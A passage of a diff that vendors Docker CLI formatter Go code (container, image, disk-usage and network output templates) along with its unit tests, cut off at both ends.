"ubuntu\nubuntu\n", + }, + } + + for _, testcase := range cases { + containers := []types.Container{ + {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unixTime}, + {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unixTime}, + } + out := bytes.NewBufferString("") + testcase.context.Output = out + err := ContainerWrite(testcase.context, containers) + if err != nil { + assert.Error(t, err, testcase.expected) + } else { + assert.Equal(t, out.String(), testcase.expected) + } + } +} + +func TestContainerContextWriteWithNoContainers(t *testing.T) { + out := bytes.NewBufferString("") + containers := []types.Container{} + + contexts := []struct { + context Context + expected string + }{ + { + Context{ + Format: "{{.Image}}", + Output: out, + }, + "", + }, + { + Context{ + Format: "table {{.Image}}", + Output: out, + }, + "IMAGE\n", + }, + { + Context{ + Format: NewContainerFormat("{{.Image}}", false, true), + Output: out, + }, + "", + }, + { + Context{ + Format: NewContainerFormat("table {{.Image}}", false, true), + Output: out, + }, + "IMAGE\n", + }, + { + Context{ + Format: "table {{.Image}}\t{{.Size}}", + Output: out, + }, + "IMAGE SIZE\n", + }, + { + Context{ + Format: NewContainerFormat("table {{.Image}}\t{{.Size}}", false, true), + Output: out, + }, + "IMAGE SIZE\n", + }, + } + + for _, context := range contexts { + ContainerWrite(context.context, containers) + assert.Equal(t, context.expected, out.String()) + // Clean buffer + out.Reset() + } +} + +func TestContainerContextWriteJSON(t *testing.T) { + unix := time.Now().Add(-65 * time.Second).Unix() + containers := []types.Container{ + {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unix}, + {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unix}, + } + expectedCreated := time.Unix(unix, 0).String() + expectedJSONs := []map[string]interface{}{ + {"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID1", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_baz", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""}, + {"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID2", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_bar", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""}, + } + out := bytes.NewBufferString("") + err := ContainerWrite(Context{Format: "{{json .}}", Output: out}, containers) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var m map[string]interface{} + if err := json.Unmarshal([]byte(line), &m); err != nil { + t.Fatal(err) + } + assert.DeepEqual(t, m, expectedJSONs[i]) + } +} + +func TestContainerContextWriteJSONField(t *testing.T) { + containers := []types.Container{ + {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu"}, + {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu"}, + } + out := bytes.NewBufferString("") + err := ContainerWrite(Context{Format: "{{json .ID}}", Output: out}, containers) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var s string + if err := json.Unmarshal([]byte(line), &s); err != nil { + t.Fatal(err) + } + assert.Equal(t, s, containers[i].ID) + } +} + +func TestContainerBackCompat(t *testing.T) { + containers := []types.Container{{ID: "brewhaha"}} + cases := []string{ + "ID", + "Names", + "Image", + "Command", + "CreatedAt", + "RunningFor", + "Ports", + "Status", + "Size", + "Labels", + "Mounts", + } + buf := bytes.NewBuffer(nil) + for _, c := range cases { + ctx := Context{Format: Format(fmt.Sprintf("{{ .%s }}", c)), Output: buf} + if err := ContainerWrite(ctx, containers); err != nil { + t.Logf("could not render template for field '%s': %v", c, err) + t.Fail() + } + buf.Reset() + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom.go b/vendor/github.com/docker/docker/cli/command/formatter/custom.go new file mode 100644 index 0000000000..df32684429 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/custom.go @@ -0,0 +1,51 @@ +package formatter + +import ( + "strings" +) + +const ( + imageHeader = "IMAGE" + createdSinceHeader = "CREATED" + createdAtHeader = "CREATED AT" + sizeHeader = "SIZE" + labelsHeader = "LABELS" + nameHeader = "NAME" + driverHeader = "DRIVER" + scopeHeader = "SCOPE" +) + +type subContext interface { + FullHeader() string + AddHeader(header string) +} + +// HeaderContext provides the subContext interface for managing headers +type HeaderContext struct { + header []string +} + +// FullHeader returns the header as a string +func (c *HeaderContext) FullHeader() string { + if c.header == nil { + return "" + } + return strings.Join(c.header, "\t") +} + +// AddHeader adds another column to the header +func (c *HeaderContext) AddHeader(header string) { + if c.header == nil { + c.header = []string{} + } + c.header = append(c.header, strings.ToUpper(header)) +} + +func stripNamePrefix(ss []string) []string { + sss := make([]string, len(ss)) + for i, s := range ss { + sss[i] = s[1:] + } + + return sss +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go new file mode 100644 index 0000000000..da42039dca --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go @@ -0,0 +1,28 @@ +package formatter + +import ( + "reflect" + "strings" + "testing" +) + +func compareMultipleValues(t *testing.T, value, expected string) { + // comma-separated values means probably a map input, which won't + // be guaranteed to have the same order as our expected value + // We'll create maps and use reflect.DeepEquals to check instead: + entriesMap := make(map[string]string) + expMap := make(map[string]string) + entries := strings.Split(value, ",") + expectedEntries := strings.Split(expected, ",") + for _, entry := range entries { + keyval := strings.Split(entry, "=") + entriesMap[keyval[0]] = keyval[1] + } + for _, expected := range expectedEntries { + keyval := strings.Split(expected, "=") + expMap[keyval[0]] = keyval[1] + } + if !reflect.DeepEqual(expMap, entriesMap) { + t.Fatalf("Expected entries: %v, got: %v", expected, value) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go new file mode 100644 index 0000000000..5309d880a5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go @@ -0,0 +1,334 @@ +package formatter + +import ( + "bytes" + "fmt" + "strings" + "text/template" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + units "github.com/docker/go-units" +) + +const ( + defaultDiskUsageImageTableFormat = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.VirtualSize}}\t{{.SharedSize}}\t{{.UniqueSize}}\t{{.Containers}}" + defaultDiskUsageContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.LocalVolumes}}\t{{.Size}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Names}}" + defaultDiskUsageVolumeTableFormat = "table {{.Name}}\t{{.Links}}\t{{.Size}}" + defaultDiskUsageTableFormat = "table {{.Type}}\t{{.TotalCount}}\t{{.Active}}\t{{.Size}}\t{{.Reclaimable}}" + + typeHeader = "TYPE" + totalHeader = "TOTAL" + activeHeader = "ACTIVE" + reclaimableHeader = "RECLAIMABLE" + containersHeader = "CONTAINERS" + sharedSizeHeader = "SHARED SIZE" + uniqueSizeHeader = "UNIQUE SiZE" +) + +// DiskUsageContext contains disk usage specific information required by the formater, encapsulate a Context struct. +type DiskUsageContext struct { + Context + Verbose bool + LayersSize int64 + Images []*types.ImageSummary + Containers []*types.Container + Volumes []*types.Volume +} + +func (ctx *DiskUsageContext) startSubsection(format string) (*template.Template, error) { + ctx.buffer = bytes.NewBufferString("") + ctx.header = "" + ctx.Format = Format(format) + ctx.preFormat() + + return ctx.parseFormat() +} + +func (ctx *DiskUsageContext) Write() { + if ctx.Verbose == false { + ctx.buffer = bytes.NewBufferString("") + ctx.Format = defaultDiskUsageTableFormat + ctx.preFormat() + + tmpl, err := ctx.parseFormat() + if err != nil { + return + } + + err = ctx.contextFormat(tmpl, &diskUsageImagesContext{ + totalSize: ctx.LayersSize, + images: ctx.Images, + }) + if err != nil { + return + } + err = ctx.contextFormat(tmpl, &diskUsageContainersContext{ + containers: ctx.Containers, + }) + if err != nil { + return + } + + err = ctx.contextFormat(tmpl, &diskUsageVolumesContext{ + volumes: ctx.Volumes, + }) + if err != nil { + return + } + + ctx.postFormat(tmpl, &diskUsageContainersContext{containers: []*types.Container{}}) + + return + } + + // First images + tmpl, err := ctx.startSubsection(defaultDiskUsageImageTableFormat) + if err != nil { + return + } + + ctx.Output.Write([]byte("Images space usage:\n\n")) + for _, i := range ctx.Images { + repo := "" + tag := "" + if len(i.RepoTags) > 0 && !isDangling(*i) { + // Only show the first tag + ref, err := reference.ParseNamed(i.RepoTags[0]) + if err != nil { + continue + } + if nt, ok := ref.(reference.NamedTagged); ok { + repo = ref.Name() + tag = nt.Tag() + } + } + + err = ctx.contextFormat(tmpl, &imageContext{ + repo: repo, + tag: tag, + trunc: true, + i: *i, + }) + if err != nil { + return + } + } + ctx.postFormat(tmpl, &imageContext{}) + + // Now containers + ctx.Output.Write([]byte("\nContainers space usage:\n\n")) + tmpl, err = ctx.startSubsection(defaultDiskUsageContainerTableFormat) + if err != nil { + return + } + for _, c := range ctx.Containers { + // Don't display the virtual size + c.SizeRootFs = 0 + err = ctx.contextFormat(tmpl, &containerContext{ + trunc: true, + c: *c, + }) + if err != nil { + return + } + } + ctx.postFormat(tmpl, &containerContext{}) + + // And volumes + ctx.Output.Write([]byte("\nLocal Volumes space usage:\n\n")) + tmpl, err = ctx.startSubsection(defaultDiskUsageVolumeTableFormat) + if err != nil { + return + } + for _, v := range ctx.Volumes { + err = ctx.contextFormat(tmpl, &volumeContext{ + v: *v, + }) + if err != nil { + return + } + } + ctx.postFormat(tmpl, &volumeContext{v: types.Volume{}}) +} + +type diskUsageImagesContext struct { + HeaderContext + totalSize int64 + images []*types.ImageSummary +} + +func (c *diskUsageImagesContext) Type() string { + c.AddHeader(typeHeader) + return "Images" +} + +func (c *diskUsageImagesContext) TotalCount() string { + c.AddHeader(totalHeader) + return fmt.Sprintf("%d", len(c.images)) +} + +func (c *diskUsageImagesContext) Active() string { + c.AddHeader(activeHeader) + used := 0 + for _, i := range c.images { + if i.Containers > 0 { + used++ + } + } + + return fmt.Sprintf("%d", used) +} + +func (c *diskUsageImagesContext) Size() string { + c.AddHeader(sizeHeader) + return units.HumanSize(float64(c.totalSize)) + +} + +func (c *diskUsageImagesContext) Reclaimable() string { + var used int64 + + c.AddHeader(reclaimableHeader) + for _, i := range c.images { + if i.Containers != 0 { + if i.VirtualSize == -1 || i.SharedSize == -1 { + continue + } + used += i.VirtualSize - i.SharedSize + } + } + + reclaimable := c.totalSize - used + if c.totalSize > 0 { + return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/c.totalSize) + } + return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) +} + +type diskUsageContainersContext struct { + HeaderContext + verbose bool + containers []*types.Container +} + +func (c *diskUsageContainersContext) Type() string { + c.AddHeader(typeHeader) + return "Containers" +} + +func (c *diskUsageContainersContext) TotalCount() string { + c.AddHeader(totalHeader) + return fmt.Sprintf("%d", len(c.containers)) +} + +func (c *diskUsageContainersContext) isActive(container types.Container) bool { + return strings.Contains(container.State, "running") || + strings.Contains(container.State, "paused") || + strings.Contains(container.State, "restarting") +} + +func (c *diskUsageContainersContext) Active() string { + c.AddHeader(activeHeader) + used := 0 + for _, container := range c.containers { + if c.isActive(*container) { + used++ + } + } + + return fmt.Sprintf("%d", used) +} + +func (c *diskUsageContainersContext) Size() string { + var size int64 + + c.AddHeader(sizeHeader) + for _, container := range c.containers { + size += container.SizeRw + } + + return units.HumanSize(float64(size)) +} + +func (c *diskUsageContainersContext) Reclaimable() string { + var reclaimable int64 + var totalSize int64 + + c.AddHeader(reclaimableHeader) + for _, container := range c.containers { + if !c.isActive(*container) { + reclaimable += container.SizeRw + } + totalSize += container.SizeRw + } + + if totalSize > 0 { + return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize) + } + + return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) +} + +type diskUsageVolumesContext struct { + HeaderContext + verbose bool + volumes []*types.Volume +} + +func (c *diskUsageVolumesContext) Type() string { + c.AddHeader(typeHeader) + return "Local Volumes" +} + +func (c *diskUsageVolumesContext) TotalCount() string { + c.AddHeader(totalHeader) + return fmt.Sprintf("%d", len(c.volumes)) +} + +func (c *diskUsageVolumesContext) Active() string { + c.AddHeader(activeHeader) + + used := 0 + for _, v := range c.volumes { + if v.UsageData.RefCount > 0 { + used++ + } + } + + return fmt.Sprintf("%d", used) +} + +func (c *diskUsageVolumesContext) Size() string { + var size int64 + + c.AddHeader(sizeHeader) + for _, v := range c.volumes { + if v.UsageData.Size != -1 { + size += v.UsageData.Size + } + } + + return units.HumanSize(float64(size)) +} + +func (c *diskUsageVolumesContext) Reclaimable() string { + var reclaimable int64 + var totalSize int64 + + c.AddHeader(reclaimableHeader) + for _, v := range c.volumes { + if v.UsageData.Size != -1 { + if v.UsageData.RefCount == 0 { + reclaimable += v.UsageData.Size + } + totalSize += v.UsageData.Size + } + } + + if totalSize > 0 { + return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize) + } + + return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go new file mode 100644 index 0000000000..e859a1ca26 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go @@ -0,0 +1,123 @@ +package formatter + +import ( + "bytes" + "fmt" + "io" + "strings" + "text/tabwriter" + "text/template" + + "github.com/docker/docker/utils/templates" +) + +// Format keys used to specify certain kinds of output formats +const ( + TableFormatKey = "table" + RawFormatKey = "raw" + PrettyFormatKey = "pretty" + + defaultQuietFormat = "{{.ID}}" +) + +// Format is the format string rendered using the Context +type Format string + +// IsTable returns true if the format is a table-type format +func (f Format) IsTable() bool { + return strings.HasPrefix(string(f), TableFormatKey) +} + +// Contains returns true if the format contains the substring +func (f Format) Contains(sub string) bool { + return strings.Contains(string(f), sub) +} + +// Context contains information required by the formatter to print the output as desired. +type Context struct { + // Output is the output stream to which the formatted string is written. + Output io.Writer + // Format is used to choose raw, table or custom format for the output. + Format Format + // Trunc when set to true will truncate the output of certain fields such as Container ID. + Trunc bool + + // internal element + finalFormat string + header string + buffer *bytes.Buffer +} + +func (c *Context) preFormat() { + c.finalFormat = string(c.Format) + + // TODO: handle this in the Format type + if c.Format.IsTable() { + c.finalFormat = c.finalFormat[len(TableFormatKey):] + } + + c.finalFormat = strings.Trim(c.finalFormat, " ") + r := strings.NewReplacer(`\t`, "\t", `\n`, "\n") + c.finalFormat = r.Replace(c.finalFormat) +} + +func (c *Context) parseFormat() (*template.Template, error) { + tmpl, err := templates.Parse(c.finalFormat) + if err != nil { + return tmpl, fmt.Errorf("Template parsing error: %v\n", err) + } + return tmpl, err +} + +func (c *Context) postFormat(tmpl *template.Template, subContext subContext) { + if c.Format.IsTable() { + if len(c.header) == 0 { + // if we still don't have a header, we didn't have any containers so we need to fake it to get the right headers from the template + tmpl.Execute(bytes.NewBufferString(""), subContext) + c.header = subContext.FullHeader() + } + + t := tabwriter.NewWriter(c.Output, 20, 1, 3, ' ', 0) + t.Write([]byte(c.header)) + t.Write([]byte("\n")) + c.buffer.WriteTo(t) + t.Flush() + } else { + c.buffer.WriteTo(c.Output) + } +} + +func (c *Context) contextFormat(tmpl *template.Template, subContext subContext) error { + if err := tmpl.Execute(c.buffer, subContext); err != nil { + return fmt.Errorf("Template parsing error: %v\n", err) + } + if c.Format.IsTable() && len(c.header) == 0 { + c.header = subContext.FullHeader() + } + c.buffer.WriteString("\n") + return nil +} + +// SubFormat is a function type accepted by Write() +type SubFormat func(func(subContext) error) error + +// Write the template to the buffer using this Context +func (c *Context) Write(sub subContext, f SubFormat) error { + c.buffer = bytes.NewBufferString("") + c.preFormat() + + tmpl, err := c.parseFormat() + if err != nil { + return err + } + + subFormat := func(subContext subContext) error { + return c.contextFormat(tmpl, subContext) + } + if err := f(subFormat); err != nil { + return err + } + + c.postFormat(tmpl, sub) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image.go b/vendor/github.com/docker/docker/cli/command/formatter/image.go new file mode 100644 index 0000000000..5c7de826f0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/image.go @@ -0,0 +1,259 @@ +package formatter + +import ( + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + units "github.com/docker/go-units" +) + +const ( + defaultImageTableFormat = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}" + defaultImageTableFormatWithDigest = "table {{.Repository}}\t{{.Tag}}\t{{.Digest}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}" + + imageIDHeader = "IMAGE ID" + repositoryHeader = "REPOSITORY" + tagHeader = "TAG" + digestHeader = "DIGEST" +) + +// ImageContext contains image specific information required by the formater, encapsulate a Context struct. +type ImageContext struct { + Context + Digest bool +} + +func isDangling(image types.ImageSummary) bool { + return len(image.RepoTags) == 1 && image.RepoTags[0] == ":" && len(image.RepoDigests) == 1 && image.RepoDigests[0] == "@" +} + +// NewImageFormat returns a format for rendering an ImageContext +func NewImageFormat(source string, quiet bool, digest bool) Format { + switch source { + case TableFormatKey: + switch { + case quiet: + return defaultQuietFormat + case digest: + return defaultImageTableFormatWithDigest + default: + return defaultImageTableFormat + } + case RawFormatKey: + switch { + case quiet: + return `image_id: {{.ID}}` + case digest: + return `repository: {{ .Repository }} +tag: {{.Tag}} +digest: {{.Digest}} +image_id: {{.ID}} +created_at: {{.CreatedAt}} +virtual_size: {{.Size}} +` + default: + return `repository: {{ .Repository }} +tag: {{.Tag}} +image_id: {{.ID}} +created_at: {{.CreatedAt}} +virtual_size: {{.Size}} +` + } + } + + format := Format(source) + if format.IsTable() && digest && !format.Contains("{{.Digest}}") { + format += "\t{{.Digest}}" + } + return format +} + +// ImageWrite writes the formatter images using the ImageContext +func ImageWrite(ctx ImageContext, images []types.ImageSummary) error { + render := func(format func(subContext subContext) error) error { + return imageFormat(ctx, images, format) + } + return ctx.Write(&imageContext{}, render) +} + +func imageFormat(ctx ImageContext, images []types.ImageSummary, format func(subContext subContext) error) error { + for _, image := range images { + images := []*imageContext{} + if isDangling(image) { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: "", + tag: "", + digest: "", + }) + } else { + repoTags := map[string][]string{} + repoDigests := map[string][]string{} + + for _, refString := range append(image.RepoTags) { + ref, err := reference.ParseNamed(refString) + if err != nil { + continue + } + if nt, ok := ref.(reference.NamedTagged); ok { + repoTags[ref.Name()] = append(repoTags[ref.Name()], nt.Tag()) + } + } + for _, refString := range append(image.RepoDigests) { + ref, err := reference.ParseNamed(refString) + if err != nil { + continue + } + if c, ok := ref.(reference.Canonical); ok { + repoDigests[ref.Name()] = append(repoDigests[ref.Name()], c.Digest().String()) + } + } + + for repo, tags := range repoTags { + digests := repoDigests[repo] + + // Do not display digests as their own row + delete(repoDigests, repo) + + if !ctx.Digest { + // Ignore digest references, just show tag once + digests = nil + } + + for _, tag := range tags { + if len(digests) == 0 { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: repo, + tag: tag, + digest: "", + }) + continue + } + // Display the digests for each tag + for _, dgst := range digests { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: repo, + tag: tag, + digest: dgst, + }) + } + + } + } + + // Show rows for remaining digest only references + for repo, digests := range repoDigests { + // If digests are displayed, show row per digest + if ctx.Digest { + for _, dgst := range digests { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: repo, + tag: "", + digest: dgst, + }) + } + } else { + images = append(images, &imageContext{ + trunc: ctx.Trunc, + i: image, + repo: repo, + tag: "", + }) + } + } + } + for _, imageCtx := range images { + if err := format(imageCtx); err != nil { + return err + } + } + } + return nil +} + +type imageContext struct { + HeaderContext + trunc bool + i types.ImageSummary + repo string + tag string + digest string +} + +func (c *imageContext) ID() string { + c.AddHeader(imageIDHeader) + if c.trunc { + return stringid.TruncateID(c.i.ID) + } + return c.i.ID +} + +func (c *imageContext) Repository() string { + c.AddHeader(repositoryHeader) + return c.repo +} + +func (c *imageContext) Tag() string { + c.AddHeader(tagHeader) + return c.tag +} + +func (c *imageContext) Digest() string { + c.AddHeader(digestHeader) + return c.digest +} + +func (c *imageContext) CreatedSince() string { + c.AddHeader(createdSinceHeader) + createdAt := time.Unix(int64(c.i.Created), 0) + return units.HumanDuration(time.Now().UTC().Sub(createdAt)) +} + +func (c *imageContext) CreatedAt() string { + c.AddHeader(createdAtHeader) + return time.Unix(int64(c.i.Created), 0).String() +} + +func (c *imageContext) Size() string { + c.AddHeader(sizeHeader) + return units.HumanSizeWithPrecision(float64(c.i.Size), 3) +} + +func (c *imageContext) Containers() string { + c.AddHeader(containersHeader) + if c.i.Containers == -1 { + return "N/A" + } + return fmt.Sprintf("%d", c.i.Containers) +} + +func (c *imageContext) VirtualSize() string { + c.AddHeader(sizeHeader) + return units.HumanSize(float64(c.i.VirtualSize)) +} + +func (c *imageContext) SharedSize() string { + c.AddHeader(sharedSizeHeader) + if c.i.SharedSize == -1 { + return "N/A" + } + return units.HumanSize(float64(c.i.SharedSize)) +} + +func (c *imageContext) UniqueSize() string { + c.AddHeader(uniqueSizeHeader) + if c.i.VirtualSize == -1 || c.i.SharedSize == -1 { + return "N/A" + } + return units.HumanSize(float64(c.i.VirtualSize - c.i.SharedSize)) +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go new file mode 100644 index 0000000000..ffe77f6677 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go @@ -0,0 +1,333 @@ +package formatter + +import ( + "bytes" + "fmt" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestImageContext(t *testing.T) { + imageID := stringid.GenerateRandomID() + unix := time.Now().Unix() + + var ctx imageContext + cases := []struct { + imageCtx imageContext + expValue string + expHeader string + call func() string + }{ + {imageContext{ + i: types.ImageSummary{ID: imageID}, + trunc: true, + }, stringid.TruncateID(imageID), imageIDHeader, ctx.ID}, + {imageContext{ + i: types.ImageSummary{ID: imageID}, + trunc: false, + }, imageID, imageIDHeader, ctx.ID}, + {imageContext{ + i: types.ImageSummary{Size: 10, VirtualSize: 10}, + trunc: true, + }, "10 B", sizeHeader, ctx.Size}, + {imageContext{ + i: types.ImageSummary{Created: unix}, + trunc: true, + }, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt}, + // FIXME + // {imageContext{ + // i: types.ImageSummary{Created: unix}, + // trunc: true, + // }, units.HumanDuration(time.Unix(unix, 0)), createdSinceHeader, ctx.CreatedSince}, + {imageContext{ + i: types.ImageSummary{}, + repo: "busybox", + }, "busybox", repositoryHeader, ctx.Repository}, + {imageContext{ + i: types.ImageSummary{}, + tag: "latest", + }, "latest", tagHeader, ctx.Tag}, + {imageContext{ + i: types.ImageSummary{}, + digest: "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", + }, "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", digestHeader, ctx.Digest}, + } + + for _, c := range cases { + ctx = c.imageCtx + v := c.call() + if strings.Contains(v, ",") { + compareMultipleValues(t, v, c.expValue) + } else if v != c.expValue { + t.Fatalf("Expected %s, was %s\n", c.expValue, v) + } + + h := ctx.FullHeader() + if h != c.expHeader { + t.Fatalf("Expected %s, was %s\n", c.expHeader, h) + } + } +} + +func TestImageContextWrite(t *testing.T) { + unixTime := time.Now().AddDate(0, 0, -1).Unix() + expectedTime := time.Unix(unixTime, 0).String() + + cases := []struct { + context ImageContext + expected string + }{ + // Errors + { + ImageContext{ + Context: Context{ + Format: "{{InvalidFunction}}", + }, + }, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + ImageContext{ + Context: Context{ + Format: "{{nil}}", + }, + }, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + // Table Format + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table", false, false), + }, + }, + `REPOSITORY TAG IMAGE ID CREATED SIZE +image tag1 imageID1 24 hours ago 0 B +image tag2 imageID2 24 hours ago 0 B + imageID3 24 hours ago 0 B +`, + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", false, false), + }, + }, + "REPOSITORY\nimage\nimage\n\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", false, true), + }, + Digest: true, + }, + `REPOSITORY DIGEST +image sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf +image + +`, + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", true, false), + }, + }, + "REPOSITORY\nimage\nimage\n\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table", true, false), + }, + }, + "imageID1\nimageID2\nimageID3\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table", false, true), + }, + Digest: true, + }, + `REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE +image tag1 sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf imageID1 24 hours ago 0 B +image tag2 imageID2 24 hours ago 0 B + imageID3 24 hours ago 0 B +`, + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table", true, true), + }, + Digest: true, + }, + "imageID1\nimageID2\nimageID3\n", + }, + // Raw Format + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("raw", false, false), + }, + }, + fmt.Sprintf(`repository: image +tag: tag1 +image_id: imageID1 +created_at: %s +virtual_size: 0 B + +repository: image +tag: tag2 +image_id: imageID2 +created_at: %s +virtual_size: 0 B + +repository: +tag: +image_id: imageID3 +created_at: %s +virtual_size: 0 B + +`, expectedTime, expectedTime, expectedTime), + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("raw", false, true), + }, + Digest: true, + }, + fmt.Sprintf(`repository: image +tag: tag1 +digest: sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf +image_id: imageID1 +created_at: %s +virtual_size: 0 B + +repository: image +tag: tag2 +digest: +image_id: imageID2 +created_at: %s +virtual_size: 0 B + +repository: +tag: +digest: +image_id: imageID3 +created_at: %s +virtual_size: 0 B + +`, expectedTime, expectedTime, expectedTime), + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("raw", true, false), + }, + }, + `image_id: imageID1 +image_id: imageID2 +image_id: imageID3 +`, + }, + // Custom Format + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("{{.Repository}}", false, false), + }, + }, + "image\nimage\n\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("{{.Repository}}", false, true), + }, + Digest: true, + }, + "image\nimage\n\n", + }, + } + + for _, testcase := range cases { + images := []types.ImageSummary{ + {ID: "imageID1", RepoTags: []string{"image:tag1"}, RepoDigests: []string{"image@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"}, Created: unixTime}, + {ID: "imageID2", RepoTags: []string{"image:tag2"}, Created: unixTime}, + {ID: "imageID3", RepoTags: []string{":"}, RepoDigests: []string{"@"}, Created: unixTime}, + } + out := bytes.NewBufferString("") + testcase.context.Output = out + err := ImageWrite(testcase.context, images) + if err != nil { + assert.Error(t, err, testcase.expected) + } else { + assert.Equal(t, out.String(), testcase.expected) + } + } +} + +func TestImageContextWriteWithNoImage(t *testing.T) { + out := bytes.NewBufferString("") + images := []types.ImageSummary{} + + contexts := []struct { + context ImageContext + expected string + }{ + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("{{.Repository}}", false, false), + Output: out, + }, + }, + "", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", false, false), + Output: out, + }, + }, + "REPOSITORY\n", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("{{.Repository}}", false, true), + Output: out, + }, + }, + "", + }, + { + ImageContext{ + Context: Context{ + Format: NewImageFormat("table {{.Repository}}", false, true), + Output: out, + }, + }, + "REPOSITORY DIGEST\n", + }, + } + + for _, context := range contexts { + ImageWrite(context.context, images) + assert.Equal(t, out.String(), context.expected) + // Clean buffer + out.Reset() + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network.go b/vendor/github.com/docker/docker/cli/command/formatter/network.go new file mode 100644 index 0000000000..7fbad7d2ab --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/network.go @@ -0,0 +1,117 @@ +package formatter + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" +) + +const ( + defaultNetworkTableFormat = "table {{.ID}}\t{{.Name}}\t{{.Driver}}\t{{.Scope}}" + + networkIDHeader = "NETWORK ID" + ipv6Header = "IPV6" + internalHeader = "INTERNAL" +) + +// NewNetworkFormat returns a Format for rendering using a network Context +func NewNetworkFormat(source string, quiet bool) Format { + switch source { + case TableFormatKey: + if quiet { + return defaultQuietFormat + } + return defaultNetworkTableFormat + case RawFormatKey: + if quiet { + return `network_id: 